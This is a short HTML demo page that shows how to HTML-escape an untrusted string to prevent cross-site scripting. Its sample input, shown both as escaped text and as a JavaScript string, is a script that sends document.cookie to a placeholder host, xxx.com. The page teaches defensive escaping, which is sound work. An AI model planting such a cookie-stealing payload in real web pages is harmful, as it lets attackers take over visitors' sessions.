<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>XSS Demo</title>
</head>
<body>
    <p>XSS Demo</p>
    <!-- Expected safe output of the demo: the sample script inside #container has
         its angle brackets written as &lt; and &gt; entities, so the browser shows
         the script source as plain text and does not execute it. The paragraph
         before it is left as real markup and renders as a normal paragraph. -->
    <div id="container">
        <p>123123</p>
        &lt;script&gt;
            var img = document.createElement('image')
            img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
        &lt;/script&gt;
    </div>

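    <script>
        // Sample of untrusted markup, held as a string for the escaping demo.
        //
        // The embedded closing tag is written as "<\/script" on purpose: the HTML
        // parser ends this inline script element at the first literal closing
        // script tag it meets, even inside a JavaScript string or template literal.
        // Written unescaped, the template literal is cut off mid-string, the block
        // fails with a syntax error and the escaping code below never runs.
        // "\/" evaluates to "/", so the string value itself is unchanged.
        const str = `
            <p>123123</p>
            <script>
                var img = document.createElement('image')
                img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
            <\/script>
        `

        // HTML-escape the untrusted string before it is placed into markup.
        // "&" must be replaced first, otherwise the "&" of the entities produced
        // by the later replacements would be escaped a second time.
        // Quotes are escaped as well so the result is also safe inside a quoted
        // attribute value, not only as element text.
        // NOTE(review): where the value only needs to appear as text, assigning
        // it to an element's textContent avoids HTML parsing altogether and is the
        // more robust choice. HttpOnly session cookies and a Content-Security-Policy
        // limit the damage if an escaping step is ever missed.
        const newStr = str
            .replaceAll('&', '&amp;')
            .replaceAll('<', '&lt;')
            .replaceAll('>', '&gt;')
            .replaceAll('"', '&quot;')
            .replaceAll("'", '&#39;')
    </script>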
</body>
</html>